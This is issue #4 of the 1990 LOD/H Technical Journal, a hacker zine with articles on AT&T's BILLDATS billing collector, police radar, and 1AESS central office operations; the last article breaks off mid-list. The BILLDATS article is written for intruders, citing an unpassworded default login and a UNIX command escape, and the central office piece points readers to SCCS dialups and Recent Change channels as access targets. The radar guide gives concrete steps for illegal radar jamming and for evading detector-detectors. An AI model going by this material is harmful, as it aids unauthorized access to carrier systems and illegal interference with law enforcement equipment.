The LOD/H Technical Journal, Issue #4: File 01 of 10 Finally Released: May 20, 1990 THE LOD/H TECHNICAL JOURNAL INTRODUCTION ------------- We are still alive. This publication is not released on any schedule. Past attempts at scheduling issues have failed miserably. The editors refuse to release issues which are not up to our self-defined standards. We have in the past, and will continue in the future, to accept articles from anyone (e.g. non LOD) as long as the articles adhere to our basic format and style. The editors review all articles to verify accuracy and integrity however it may not be possible in all cases to check every fact. Plagiarized material is not acceptable and we make every attempt to verify an article's originality. When referenced material is used, the source for that material must be clearly stated. The more articles we receive the sooner each issue is released. There is a minimum 2 month review and editing period for each article. If you want to contribute articles contact any member and they will forward articles to the editors. There seems to be some confusion as to what writers are (or were) in LOD/H and what ones aren't. JUST BECAUSE SOMEONE WRITES FOR THIS PUBLICATION DOES NOT MEAN THEY ARE AN LOD/H MEMBER! Just to clear up any confusion, a current member list follows: Lord Havok Lex Luthor Prime Suspect Phase Jitter Professor Falken Skinny Puppy File 06: The History of LOD/H is a short article explaining the origin of the group. We realize this is of interest to only a few, and most people probably could care less. However, also included is a list of EVERY member who was ever in the group. This is to clear up any and all misconceptions about members. The press, telecommunications and computer security people, law enforcement, and others can finally get their facts straight [See Issue #3, article 10, Clearing up the mythical LOD/H Busts for a prime example, and also in the Network News and Notes section -- first two articles regarding more so called 'LOD BUSTS']. Another purpose is to thwart would-be group impostors. SYSOPS who give system access to individuals solely because they are a member of some respected group are urged to verify the hacker's identity as best they can. No one should be taken on their word alone. This issue is dedicated to the three (now "retired") members who recently received visits from our friends and yours, the U.S. Secret Service and Bell South Security: The Leftist, The Urvile, and The Prophet. Again, see the Network News and Notes section for the stories. Although the TJ is distributed to many boards, the inability for any decent board to consistently remain online prevents us from utilizing "sponsor" boards as distribution hubs. Therefore, the TJ will be distributed to whatever boards are around at the time of release. Due to the lack of boards the newsletter will be distributed in diskette form to those who can help in its distribution. ___________________________________________________________________________ TABLE OF CONTENTS Name of article or file Author Size ----------------------------------------------------------------------------- 01 Introduction to the LOD/H Technical Journal Staff 04K and Table Of Contents for Issue #4 02 The AT&T BILLDATS Collector System Rogue Fed 14K 03 The RADAR Guidebook Professor Falken 17K 04 Central Office Operations Agent Steal 32K 05 A Hackers Guide to UUCP The Mentor 27K 06 The History Of LOD/H Lex Luthor 12K 07 The Trasher's Handbook to BMOSS Spherical Abberation 11K 08 The LOD/H Telenet Directory Update #4 Part A Lord Havok 65K 09 The LOD/H Telenet Directory Update #4 Part B Lord Havok 43K 10 Network News and Notes Staff 38K Total: 7 Articles 10 Files 263K ____________________________________________________________________________ End Of Intro/TOC Issue #4 The LOD/H Technical Journal, Issue #4: File 02 of 10 The AT&T BILLDATS Collector Written by: Rogue Fed ============================================================================== NOTES: This article will hopefully give you a better understanding of how the billing process occurs. BILLDATS is just one part of the billing picture. Before I began working for the government, I was a Telco employee and thus, the information within this article has been learned through experience. Unfortunately, I was only employed for a few months (including training on BILLDATS) and am still learning more about the many systems that a telco uses. There are however, a couple of lists that were compiled and slightly modified from what little reference material I could smuggle out and my notes from the training class. This article does require a cursory knowledge of telco and computer operations (ie. switching, SCCS, UNIX). INTRODUCTION - ============== BILLDATS - BILLing DATa System BILLDATS can be explained in a nutshell by the acronym listed above. If it's one thing telecommunications providers do well, it's creating acronyms. Basically, BILLDATS collects billing information (that's why they call it a Collector) from AMATs (Automatic Message Accounting Transmitters). The AMATs are situated in or close to switching offices and are connected to BILLDATS either through dedicated or dial-up lines. BILLDATS can be considered as the "middleman" in the billing process. The system collects, validates, and adds identification information regarding origination and destination. This is then transferred to tape (or transmitted directly) to the RPC (Regional Processing Center) or the RAO (Revenue Accounting Office). The RPC/RAO actually processes the billing information. Typically the BILLDATS system is located in the same or adjoining building (but can be across town) to the RPC/RAO. BILLDATS is similar to many other phone company systems (ie. SCCS) as it uses a combination of software. The software base is UNIX and the BILLDATS Generic program runs on it. The hardware used is an AT&T 3B20 (this is what 5ESS switches use). Some of the more interesting features BILLDATS possesses are: * Can be accessed via dialup (always a plus). * Runs under UNIX (another plus). * Interface with SCCS (yet another plus). * Can store about 12 million calls for the first two disks and about 8 million calls for each additional disk. A total of 6 (675 MB) disks can be used. * Inserts the sensor type and ID and recording office type and ID onto every AMA record that it collects. * Capable of collecting information from nearly 600 AMATs. To better understand how/why you get a bill after making long distance phone calls, I have delineated the steps involved. You call Hacker X and tell him all about the latest busts that have occurred, he exclaims "Oh Shit!" hangs up on you and throws all his hacking information into the fireplace. The actual call is referred to as a call event. As each event happens (upon termination of the call) the event is recorded by the switch. This information is then sent via an AMA Transmitter which formats the information and then sends it to BILLDATS (commonly called a "Host Collector"). BILLDATS then provides the information to the RAO/RPC. The billing computer is located at the RAO/RPC. Do not confuse the actual billing system with BILLDATS! The billing computer: * Contains customer records * Credit ratings (in some telcos) * Totals and prints the bill * Generates messages when customers do not pay (ie. last chance and temporary termination of service) When the billing period is over, (typically 25-30 days), many events (it depends on how many calls you have made) have accumulated. A bill is then generated and mailed to you. COLLECTION - ============ BILLDATS collects information in two ways: 1. AMATs 2. Users AMAT input ---------- BILLDATS collects data from the AMAT either directly from the switch, or from a front end which performs some processing on the data before giving it to BILLDATS. The data I am talking about here is usually AMA billing information. The information is in the usual AMA format (see Phantom Phreaker's article in the LOD/H Technical Journal, Issue #3 on AMA for formats and other info). As I said earlier, the recording office and sensor types and IDs have to be added by BILLDATS. The other information that is transmitted is usually maintenance data. The data that is transferred between BILLDATS and an AMAT is accomplished over either dedicated or dialup lines using the BX.25 protocol. This protocol has been adopted by the telecommunications industry as a whole. It is basically a modified version of X.25. User input ---------- This is simply sysadmin and sysop information. INSERTED INFORMATION - ====================== Once the information is collected, additional data (mentioned earlier) must be inserted. The information that BILLDATS inserts into the AMA records it receives depends on whether the AMAT is a single or multi-switch AMAT. Either way, the data is passed through the DEP. The DEP is a module which is part of the LHS (Link Handler Subsystem) that actually inserts the additional data. It also performs other functions which are rather uninteresting to the hacker. The LHS manages the x-mission of all the collected information. This is either through dedicated or dialup lines. The LHS is responsible for: * Logging of statistics as related to the performance of links. * Polling of remote switches for maintenance and billing information. * Passing information to the DEP in which additional information is inserted. * Storing billing information. * Other boring stuff. AMATS - ======= Basically an AMAT is a front end to the switch. The AMAT: * Gets AMA information from the switch. * Formats and processes the information. * Transmits it to BILLDATS. * An AMAT can also store information for up to 1 week. The following is a list of switches and their related AMAT equipment that BILLDATS obtains billing information from: 1A ESS: This is usually connected to a 3B APS (Attached Processor System) or BILLDATS AMAT. 2ESS: This is connected to an IBM Series 1 AMAT. 2BESS: Connected to a BILLDATS AMAT. 4ESS: Connects to 3B APS. 5ESS: Direct connection. TSPS 3B:Direct connection. DMS-10: Connects to IBM Series 1 AMAT. There are other AMATs/Switches but they must be compatible with the BILLDATS interface. ACCESSING BILLDATS - ==================== Even though a system is UNIX based, that doesn't mean that it is a piece of cake to get into. Surprisingly (when you think about the average Intelligence Quotient of telco personnel) but not surprisingly (when you consider that the information contained on the system is BILLING information--the life blood of the phone company) BILLDATS is a little more secure than your average telco system, except for the fact the all login IDs are 5 lower case characters or less. BILLDATS can usually be identified by: bcxxxx 3bunix SV_R2+ where: bc = B(ILLDATS) C(ollector). xxxx = The node suffix. This is entered when the current Generic is installed. 3bunix = This simply indicates that UNIX is running on an AT&T 3Bxx system. SV_R2+ = Software Version. The good news is that there is a default username when the system is installed. The bad news is that upon logon, the system forces you to choose a password. The default username is not passworded initially. The added security feature is simply that the system forces all usernames to have passwords. If it doesn't have an associated password, the system will give you the message: "Your password has expired. Choose a new one" A 6-8 character password must then be entered. After this you will be asked to enter the terminal type. The ones provided are AT&T terminals (615, 4425, and 5420 models). Once entered a welcome message will probably be displayed: "Welcome to the South Western Bell BILLDATS Collector" "Generic 3, Issue 1" "Tuesday 01 Aug 1989 12:44:44 PM" dallas> The BILLDATS prompt was displayed "dallas>" where dallas is the node name. There are 3 privilege levels within BILLDATS: 1. Administrator 2. Operator 3. UUCP * Administrator privs are basically root privs. * An account with Operator privs can still do about anything an Admin can do except make data base changes. * UUCP privs are the lowest and allow file transfer. Commands -------- Just like SCCS, UNIX commands can be entered while using BILLDATS. The format is: dallas>run-unx:$unix cmd; All unix commands must be preceded by "run-unx:" and end with a semicolon ";". The semicolon is the command terminator character (just like Carriage Return). BILLDATS isn't exactly user friendly, but it does have on-line help. There are a number of ways that it can be obtained: dallas> help-?; or help-??; or ?-help; or ??-help; If you want specific help: dallas> help-(command name); I can list commands forever, but between UNIX (commands every hacker should be familiar with) and help (any moron can use it), you can figure out which ones are important. Error Messages -------------- Just like SCCS, BILLDATS has some rather cryptic error messages. There are thousands of error messages, once you know a little about the format they are easier to understand. When a mistake is made, something similar to the following will appear: UI0029 (attempted command) is not a valid input string. ^ ^- error message information | |-- This is the subsystem and error message number The following is a brief description of subsystem abbreviations: BD: BILLDATS system utilities. Errors associated with the use of utility programs will be displayed. DB: Data Base manager. These messages are generated when accessing or attempting to access the various Data Bases (explained later) within BILLDATS. DM: Disk Manager. Basically, information pertaining to the system disk(s). EA: Error and Alarm. As the name implies, system errors and alarms. LH: Link Handler. Messages related to data link activity, either between BILLDATS and the AMAT or BILLDATS and the RAO/RPC. SC: Scheduler. The scheduler is BILLDATS' version of the UNIX cron daemon. BILLDATS uses cron to schedule things like when to access remote systems. TW: Tape Writer. Messages related to storing billing information on tapes which will then be transported to the RAO/RPC. UI: User Interface. This was used in the above example. Displays syntax, range or status errors when entering commands. DL: Direct Link. Instead of BILLDATS information being written to tape, a direct link to the RPC/RAO mainframe (the actual billing system computer) can be accomplished. This is usually done when BILLDATS is located far away from the RPC/RAO office as there is always some risk involved in transporting tapes, and that risk increases the farther away the two offices are. Another neat thing about Direct Link is that the billing data can be sent across a LAN (Local Area Network) also. Obviously this incurs some concerns regarding security, but from what I have heard and seen, AT&T and the BOC's typically choose to ignore the security of their systems which suits me just fine. The Direct Link is an optional BILLDATS feature and if it is in use, messages related to its operation are displayed with the DL prefix. BILLDATS DATA BASES - ===================== The databases contain all kinds of useful information such as usernames, switch types, scheduled polling times, etc. The AMAT Data Base contains: * Type of switch * Sensor type and identification * AMAT phone number * Channel and port number/group * Other boring information The Port Data Base contains: * Communications information (like L-Dialers on UNIX Sys. V) * Channel and port information * Other boring information The Collector Data Base contains: * Collector office ID * Version number of the Data Base * Number and speed of any remote terminals * When reports are scheduled for output * Other boring information CONCLUSION - ============ If you are not technically oriented, I hope this article helped you understand how you get your bill. I assumed that you would skip over the commands for using BILLDATS and similar information. If you are technically oriented, I hope I not only helped you understand more about the billing process, but also increased your awareness of how detailed the whole process is. And if you do happen to stumble onto a BILLDATS system, you have been pointed in the right direction as far as using it correctly is concerned. I tried to leave out all the boring details, but some may have slipped by me. I reserved the right to omit specific details and instructions regarding any alteration or deletion of calls/charges for my own use/abuse. The Rogue Federal Agent [ End Of Article ] The LOD/H Technical Journal, Issue #4: File 03 of 10 The Radar Guidebook by Professor Falken ----------------------------------------------------------------------------- Anyone who has driven a car without a radar detector before, has gotten that paranoid feeling that the cops are around radaring. This feeling is not a nice one; it is the feeling that somewhere somehow someone is watching you. In this article I will attempt to explain how radar guns work, what bands the guns work on, why they are wrong 70% of the time, how to employ stealth technology in defeating the radar, and last but not least jamming the radar. RADAR stands for RAdio Detecting And Ranging. A speed-radar gun works under the Doppler theory. This theory is that when a signal is reflected off an object moving toward you, the signal will be at a higher frequency than the initial frequency, this increase in frequency is used to calculate speed. Many of you have experienced the Doppler effect, which occurs when a noise from a siren increases in strength (gets louder) as it approaches and decreases in strength (gets softer) as it moves away from you. Right now in the United States, there are three bands that are Federal Communication Commission (FCC) certified for "field disturbance sensors", known to you and me as radar guns. These bands have proper non-technical names, and all operate in the GigaHertz range. GigaHertz is a measure of frequency; one GHz equals one billion cycles per second. Most frequency modulation (FM) radio broadcasts are made in the 0.088 GHz to 0.108 GHz band, in MegaHertz that is 88 MHz to 108 MHz. The three proper names for these radar bands are: X, K, and Ka. One of the older radar bands is the X band. X band radar is the most commonly used radar band in the United States. X band radar transmits its signal at 10.5250 GHz. The wattage of the radar's signal really depends upon the gun manufacturer. However, most manufacturers agree that a 100 milliwatt signal is "High-Power" and the 40 milliwatt range is "Low Power". The gun's range also depends upon the manufacturer. The average maximum range of a X band gun is 2500 feet. That estimate is based on the assumption that the gun is operating at full-strength (100mw). Most radar detectors give off a false signals on this band due to ultrasonic motion detectors employed by various burglar alarm systems. Large grocery stores also use these to open the doors magically as you walk in or out. Another older band is K band. K band operates on 24.150 GHz and is not as popular as X band, but it is gaining in usage throughout the country. The normal signal strength of K band guns again depends upon the manufacturer, but the ones I've seen all operate at 100 milliwatts at high-power. These guns have a maximum range of 3000 feet, assuming they are at 100mw signal strength. A new type of radar has been introduced and assigned a frequency by the Federal Communications Commission. This new band has been assigned the name Ka and has been designated a frequency of 34.360 GHz. Current Ka technology gives the gun a maximum effective range of 40 to 200 feet. This band was originally made for use with photo-radar. The photo-radar can be set up on a tripod on the side of the road or in the back of a police car. The user then triggers a button when he wants a car in the guns range clocked, automatically taking a picture of the car & license plate. At the time the photograph is taken a date and time is imprinted on the picture. The police keep one duplicate for archival purposes and sends the other to the registered owner of the car along with ticket information and the amount due. This type of system can only work in places that hold the owner of a vehicle responsible for any violations that occur with the car. The legal barriers for photo radar to overcome are extensive, most notably, not giving the vehicle owner due process and the presumption of guilt. There is a system out now for $19.95 that defeats Ka band photo radar. I expect it to be illegal VERY QUICKLY once Ka is more widely used. This little baby slips over your license plate and acts as venetian blinds. When looking straight at the plate it looks like a normal plate with a black frame. However when looking at it from a Ka band Photo Radar's angle it looks like a license plate with a silver streak covering the whole plate, making it impossible to identify. This device is called the Photobuster and is available from most radar detector specialty stores. There are two different types of radar guns. They are Instant-On/Pulse and Constant Broadcasting Radar. The names are self-explanatory, but I will explain them anyway. The constant broadcast radar continually transmits its radar signal, and anything in its path will be clocked. Instant-On & Pulse radars are basically identical, and are both very deadly since they are harder to detect as a threat. The Instant-On gun is really nothing more than an ON/OFF switch for signal transmission. In order to have a pulse gun, all a cop has to do is purchase one with a "HOLD" feature or just turn the gun on when he/she wishes to use it. The "HOLD" feature is simply a button that keeps the gun on but makes sure no signal is being transmitted. No one can detect a gun that is off or in "HOLD" mode. An officer using an Instant-On radar gun will periodically check the speed of the traffic. These samplings can easily be detected and will give the user of a detector prior warning to a Instant On/Pulse activated radar gun. Many detectors on the market today provide anti-falsing circuitry. Falsing is the triggering of the radar detector from something other than a radar gun. One or two detector manufactures make their detectors with GaAs diodes. GaAs diodes are Gallium Arsenide diodes which are a military grade electrical component that helps produce a good signal-to-noise ratio. All new model radar detectors use Superheterodyne technology. Superheterodyne, also known as active technology, amplifies all incoming signals hundreds of times, which makes it more sensitive and selective as to which signals will trigger an alert. Superheterodyne technology also gives out a minute internal radar signal of its own, which can be picked up by older (Pre/Early 1980's) non-anti-falsing radar detectors. If you have a newer model radar detector, this small internally generated signal is no problem to your's or anyone's anti-falsing radar detecting unit. NOTE: In states where radar detectors are illegal (Ex. Virginia, Canada) the police have devices which detect this Superheterodyne signal. Police can then stop you and confiscate your detector. Getting around this police tactic would be to use an early radar detector without Heterodyne/Superheterodyne detection technology. Many compact/shirt pocket radar units are "exclusively made with SMD's". These SMD's are Surface Mounted Devices and contain extremely small resistors, transistors, diodes, and capacitors. Just because a manufacturer uses SMD's, that does NOT make the unit any better than a larger detector of the same age. Cincinnati Microwave Inc., the makers of Escort and Passport say they have the exclusive technology for the detection and anti-falsing of RASHID VRSS technology. RASHID VRSS is actually the Rashid Radar Safety Brake Collision Warning System. It is an electronic device that operates on K band frequencies and warns heavy trucks and ambulances of hazards in their path. About 900 RASHID VRSS units have been prototyped in three states. Since the number of actual operating RASHID units is so minute, I really doubt you will run into one. There are two ways a radar gun can produce an incorrect speed reading. These are known as the Cosine Error and Moving Radar Error. The Cosine Error occurs when a radar gun gives a lower reading than the actual speed of the target. This occurs because the gun can only measure the doppler shift that occurs directly towards or away from the antenna. If the object moves at an angle to the gun, the shift will be lower than if it moves directly at the antenna. Therefore the reading the radar gun gives will be less than the actual speed of the object. The radar reading can be calculated by taking the Actual Speed times the cosine of the incidence angle. So if the target car's actual speed is 50 miles per hour and it is 37 degrees off of the mainline radar signal, the radar speed will be 40 miles per hour. Look: Cosine Error Theory: Actual Speed x Cosine of Incidence Angle = Radar's Shown Speed Cosine of 37 degrees is 0.80 50 MPH x 0.80 = 40 MPH So if you see a radar enabled cop coming head-on towards you it would be a good idea to get into the right hand lane, or further if possible, as this increases the angle and thus lowers your radar speed. The other error is the Moving Radar Error, which occurs only when a police car is using a moving radar gun. A false reading is obtained by the unit because before it can radar you it must radar something along side the road to get the patrol car's speed. Most often, billboards and parked cars are used for this initial patrol car speed calibration. It is susceptible to errors because of the Cosine Error, mentioned above. Once the patrol car has its speed (wrong or not), it assumes that the target's (YOU) speed is the difference between the highest oncoming signal and the patrol speed; but if the patrol speed is lower it will ADD that error on to the target speed. So the target speed (YOU) will read higher than you were actually traveling. Here's the theory and a problem: Moving Radar Theory: Closing Speed - Patrol Speed = Target Speed The ACTUAL speeds for these are: Patrol Car Speed - 60 MPH Target Car Speed - 60 MPH Closing Speed - 120 MPH Due to the Cosine Error the TARGET CAR's speed will cause the gun to calculate a LOW reading for the actual patrol car's speed due to the cosine error. The RADAR calculated speeds are: Patrol Car Speed - 50 MPH Target Car Speed - 70 MPH Closing Speed - 120 MPH Thus you can see how the police car is going to get an incorrect reading. This is a good one to memorize and bring into court for any tickets. It's been recently brought to my attention that there are stealth-bras for cars. From what I understand, the bras actually absorb the radar, and reflect such a weakened signal that the radar gun cannot detect it. I have not seen one of these in person, but from what I have heard they are made out of a VERY DENSE rubber/metal composite. The bra probably traps the signal very much like the F-117/B-2 stealth aircraft do. The material is probably made up of hexagonal shaped cells, the back of the cell being at a slight angle, so that any signal coming into the cell will have to bounce around within the cell before exiting it. The inside of each cell is filled with a radar absorbing material. As the signal hits the back of the hexagonal cell it is bounced around inside the cell through the absorbing material, weakening the signal each time it does so. Upon leaving the cell, the signal is so weak the radar's receiver may not pick up the signal until the target is near enough to give a positive return on the radar screen. When the aircraft is getting closer, within radar range, the signal reflected may be so small the radar's controller may think he is picking up ground interference, a flock of birds or possibly bad weather. The actual radar absorbing material is classified at this time by the government. The actual composite on the car bra is certainly not as good as the actual radar absorption material of the aircraft, but I'm sure it is somewhat similar. Radar jamming is done very much the way any other type of radio jamming is done. You simply overpower the frequency being used with a frequency of your own. Radar jamming/overpowering is ILLEGAL in the United States. To jam a signal all you need is a transmitter, an amplifier and an antenna. To jam a gun using a K band radar (24.150 GHz) all you do is get a transmitter that can transmit in the 20 GHz range and a 10-100 watt amplifier and antenna. Send out a signal at around 24.05 GHz. This signal will make the cop's radar either show a 0 or an incredibly slow speed such as -520. Usually the cop's radar cannot show a negative sign, so it will just be 520. This 10-100 watt signal that you are transmitting will overpower the signal his/her radar sent out and is waiting to receive. His/her gun is only at 100 milliwatts, and you're transmitting at 10-100 watts; its like using a 12-gauge shotgun against a rodent. Where can you get microwave transmission equipment? You can check local electronic shops, satellite stores, Cable TV companies and local television stations as to where they buy their microwave transmission gear. Or you can buy a radar gun of your own, and leave it ON whenever your driving. This will give the cop's gun a very strange reading, most likely zero. If it is possible, once you have the gun bring it to a "corrupt" electronics shop and have it modified for high powered transmission, preferably in the 10 to 100 watt range. Some radar guns have resistors implemented just before the antenna, but just after the amplifier for de-amplification of the transmitter's signal. This means that most guns already have a good (1 watt or so) transmit capacity, but it is suppressed to bring the actual transmit signal to the 100mw area. The owner of the gun only has to know which resistors to take out, then he/she will have a functional high powered gun. If this small wattage does not satisfy you, you may have to purchase a separate amplifier for the gun, and have it wired directly into the radar's transmitter antenna. This modification is expensive not to mention illegal, but then again what the hell isn't these days. I have seen six different types of guns offered from National Radar Exchange. The following are a few major radar gun manufacturers that are sold out of most radar shops. They are: KUSTOM SIGNAL: Kustom Signal HR-12 K Band 100mw signal 2000-3000 foot maximum range $695.00 Kustom Signal HR-8 K Band 100mw signal 1800-3000 foot maximum range $495.00 CMI INC.: Speedgun One X Band 100mw signal 1000-2500 foot maximum range $395.00 Speedgun Six X Band 100mw signal 1000-2500 foot maximum range $495.00 (Since these units are the same, the only differences are things like last speed reading recall, 10 number memory, etc.) MPH INC.: MPH K-55 X Band 40mw signal 1200-2500 foot maximum range $495.00 (Can clock target in 1/2 second, which is exceptionally fast for radar guns) The only differences between the models are their bands and their options, such as a "HOLD" button, last speed recorded etc. I have found these to be some of the top units in the radar detector world currently and are listed as follows: MOST SENSITIVE MOST FEATURES BEST LOOKING MOST RELIABLE SMALLEST -------------- ------------- ------------ ------------- ------------- COBRA 4120 COBRA 4120 Whistler 3SE ESCORT Uniden RD-9XL BEL 944 COBRA 3160 BELL 944 K40 Whistler 3SE Snooper 6000 BELL 944 Uniden RD-9XL BEST VALUE LOUDEST BEST FILTERED ------------ -------------- ------------------ Snooper 4000 COBRA 5110 Snooper 6000 Cobra 5110 COBRA 3120 Other Snoopers Cobra 3168 Whistler Q2002 Maxon RD25 I did not get to see Cincinnati Microwave's new "SOLO", nor BEL's "Vector 3", "Express", nor it's newer "Legend 3." Just because a detector is the MOST sensitive doesn't mean it is the best detector. Because of the sensitivity you could pick up more alarms. What you want is a detector with excellent sensitivity, but good anti-falsing circuitry. I hope this article has given you some insight on how radars work and how their tickets CAN be defeated. Keep safe and sane, Professor Falken Legion Of Doom The LOD/H Technical Journal, Issue #4: File 04 of 10 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ Central Office Operations $ $ Western Electric 1ESS,1AESS, $ $ The end office network environment $ $ $ $ Written by Agent Steal 1989 $ $ $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Topics covered in this article will be: Call tracing RCMAC Input/output messages SCC and SCCS COSMOS and LMOS BLV, (REMOB) and "No test trunks" Recent change messages Equal Access Did I get your attention? Good, everyone should read this. With the time, effort, and balls it has taken me compile this knowledge it is certainly worth your time. I hope you appreciate me taking the time to write this. I should point out that the information in this article is correct to the best of my knowledge. I'm sure there are going to be people that disagree with me on some of it, particularly the references to tracing. However, I have been involved in telecommunications and computers for 12+ years. I'm basing this article around the 1AESS since it is the most common switch in use today. ** OUTSIDE PLANT ** This is the wiring between your telephone and the central office. That is another topic in itself. If you are interested read Phucked Agent 04's article on The Outside Loop Distribution Plant (OLDP) in the LOD/H Technical Journal, Issue #1. The article explains those green boxes you see on street corners, aerial cables, manholes etc. So where that article stops, this one starts. ** CABLE VAULT ** All of the cables from other offices and from subscribers enter the central office underground. They enter into a room called the cable vault. This is a room generally in the basement located at one end or another of the building. The width of the room varies but runs the entire length of the building. Outside cables appear through holes in the wall. The cables then run up through holes in the ceiling to the frame room. Understand that each of these cables consist of an average of 3600 pairs of wires. That's 3600 telephone lines. The amount of cables obviously depends on the size of the office. All cables (e.g. interoffice, local lines, fiber optic, coaxial) enter through the cable vault. ** FRAME ROOM ** The frame is where the cable separates into individual pairs and attach to connectors. The frame runs the length of the building, from floor to ceiling. There are two sides to the frame, the horizontal side and the vertical side. The vertical side is where the outside wiring attaches and the protector fuses reside. The horizontal side is where the connectors to the switching system reside. Multi-conductor cables run from the connectors to actual switching equipment. So what we have is a large frame called the Main Distribution Frame (MDF) running the entire length of the building. From floor to ceiling it is 5 feet thick. The MDF consists of two sides, the VDF and the HDF. Cables from outside connect on one side and cables from the switching equipment connect to the other side and jumper wires connect the two. This way any piece of equipment can be connected to any incoming "cable pair". These jumper wires are simply 2 conductor twisted pair, running between the VDF and the HDF. What does all this mean? Well if you had access to COSMOS you would see information regarding cable and pair and "OE" (Office Equipment). With this information you could find your line on the frame and on the switch. The VDF side is clearly marked by cable and pair at the top of the frame, however the HDF side is a little more complicated and varies in format from frame to frame and from switch to switch. Since I am writing this article around the 1AESS, I will describe the OE format used for that switch. OE ABB-CDD-EFF Where.. A = Control Group (when more than one switch exists in that C.O.) B = LN Line Link Network C = LS Line Switching Frame D = CONC or CONCentrator E = Switch (individual, not the big one) F = Level There is one more frame designation called LOC or LOCation. This gives the location of the connector block on the HDF side. Very simply, looking at the frame: H --------------------------------------------------------------------- G --------------------------------------------------------------------- F --------------------------------------------------------------------- E --------------------------------------------------------------------- D --------------------------------------------------------------------- C --------------------------------------------------------------------- B --------------------------------------------------------------------- A --------------------------------------------------------------------- 123456789 etc. Please note that what you are looking at here represents the HDF side of the MDF, being up to 100 feet long, and 20 feet high. Each "-" represents a connector block containing connections for 4 x 24 (which is 96) pairs. So far I've covered how the wires get from you to the switching equipment. Now we get to the switching system itself. ** SWITCHING SYSTEMS ** Writing an article that covers them all would be lengthy indeed. So I am only going to list the major ones and a brief description of each. - Step by Step Strowger 1889 First automatic, required no operators for local calls No custom calling or touch tone Manufactured by many different companies in different versions Hard wire routing instructions, could not choose an alternate route if programed route was busy Each dial pulse tripped a "stepper" type relay to find its path - No.1 Crossbar 1930 - No.5 Crossbar 1947 (faster, more capacity) Western Electric First ability to find idle trunks for call routing No custom calling, or equal access Utilized 10x20 cross point relay switches Hard wired common control logic for program control Also copied by other manufactures - No.4 Crossbar Used as a toll switch for AT&T's long lines network 4 wire tandem switching Not usually used for local loop switching - No.1ESS 1966 - No.1AESS 1973 Western Electric Described in detail later - No.1EAX GTE Automatic Electric GTE's version of the 1AESS Slower and louder - No.2ESS 1967 - No.2BESS 1974 Western Electric Analog switching under digital control Very similar to the No.1ESS and No.1AESS Downsized for smaller applications _ No.3ESS Western Electric Analog switching under digital control Even smaller version of No.1AESS Rural applications for up to 4500 lines - No.2EAX GTE Automatic Electric Smaller version of 1EAX Analog switch under digital control - No.4ESS Western Electric Toll switch, 4 wire tandem Digital switching Uses the 1AESS processor - No.3EAX Gee is there a pattern here? No GTE Digital Toll switch 4 wire tandem switching - No.5ESS AT&T Network Systems Full scale computerized digital switching ISDN compatibility Utilizes time sharing technology Toll or end office - DMS 100 Digital Matrix Switch Northern Telecom Similar to 5ESS Runs slower Considerably less expensive - DMS 200 Toll and Access Tandem Optional operator services - DMS 250 Toll switch designed for common carriers - DMS 300 Toll switch for international gateways - No.5EAX GTE Automatic Electric Same as above How much does a switch cost? A fully equipped 5ESS for a 40,000 subscriber end office can cost well over 3 million dollars. Now you know why your phone bill is so much. Well...maybe you parents bill. ** The 1ESS and 1AESS ** This was the first switch of it's type put into widespread use by Bell. Primarily an analog switch under digital control, the switch is no longer being manufactured. The 1ESS has been replaced by the 5ESS and other full scale digital switches, however, it is still by far the most common switch used in today's Class 5 end offices. The #1 and 1A use a crosspoint matrix similar to the X-bar. The primary switch used in the matrix is the ferreed (remreed in the 1A). It is a two state magnetic alloy switch. It is basically a magnetic switch that does not require voltage to stay in it's present position. A voltage is only required to change the state of the switch. The No. 1 utilized a computer style, common control and memory. Memory used by the #1 changed with technology, but most have been upgraded to RAM. Line scanners monitor the status of customer lines, crosspoint switches, and all internal, outgoing, and incoming trunks, reporting their status to the central control. The central control then either calls upon program or call store memories to chose which crosspoints to activate for processing the call. The crosspoint matrices are controlled via central pulse distributors which in turn are controlled by the central control via data buses. All of the scanner's AMA tape controllers, pulse distro, x-point matrix, etc., listen to data buses for their address and command or report their information on the buses. The buses are merely cables connecting the different units to the central control. The 1E was quickly replaced by the 1A due to advances in technology. So 1A's are more common, also many of the 1E's have been upgraded to a 1A. This meant changing the ferreed to the remreed relay, adding additional peripheral component controllers (to free up central controller load) and implementation of the 1A processor. The 1A processor replaced older style electronics with integrated circuits. Both switches operate similarly. The primary differences were speed and capacity. The #1ESS could process 110,000 calls per hour and serve 128,000 lines. Most of the major common control elements are either fully or partially duplicated to ensure reliability. Systems run simultaneously and are checked against each other for errors. When a problem occurs the system will double check, reroute, or switch over to auxiliary to continue system operation. Alarms are also reported to the maintenance console and are in turn printed out on a printer near the control console. Operation of the switch is done through the Master Control Center (MCC) panel and/or a terminal. Remote operation is also done through input/output channels. These channels have different functions and therefore receive different types of output messages and have different abilities as for what type of commands they are allowed to issue. Here is a list of the commonly used TTY channels. Maintenance - Primary channel for testing, enable, disable etc. Recent Change - Changes in class of service, calling features etc. Administrative - Traffic information and control Supplementary - Traffic information supplied to automatic network control SCC Maint. - Switching Control Center interface Plant Serv.Cent.- Reports testing information to test facilities At the end of this article you will find a list of the most frequently seen Maintenance channel output messages and a brief description of their meaning. You will also find a list of frequently used input messages. There are other channels as well as back ups but the only ones to be concerned with are Recent Change and SCC maint. These are the two channels you will most likely want to get access to. The Maintenance channel doesn't leave the C.O. and is used by switch engineers as the primary way of controlling the switch. During off hours and weekends the control of the switch is transferred to the SCC. The SCC is a centrally located bureau that has up to 16 switches reporting to it via their SCC maint. channel. The SCC has a mini computer running SCCS that watches the output of all these switches for trouble conditions that require immediate attention. The SCC personnel then have the ability to input messages to that particular switch to try and correct the problem. If necessary, someone will be dispatched to the C.O. to correct the problem. I should also mention that the SCC mini, SCCS has dialups and access to SCCS means access to all the switches connected to it. The level of access however, may be dependent upon the privileges of the account you are using. The Recent Change channels also connect to a centrally located bureau referred to as the RCMAC. These bureaus are responsible for activating lines, changing class of service etc. RCMAC has been automated to a large degree by computer systems that log into COSMOS and look for pending orders. COSMOS is basically an order placement and record keeping system for central office equipment, but you should know that already, right? So this system, called Work Manager running MIZAR logs into COSMOS, pulls orders requiring recent change work, then in one batch several times a day, transmits the orders to the appropriate switch via it's Recent Change Channel. Testing of the switch is done by many different methods. Bell Labs has developed a number of systems, many accomplishing the same functions. I will only attempt to cover the ones I know fairly well. The primary testing system is the trunk test panels located at the switch itself. There are three and they all pretty much do the same thing, which is to test trunk and line paths through the switch. Trunk and Line Test Panel Supplementary Trunk Test Panel Manual Trunk Test Panel MLT 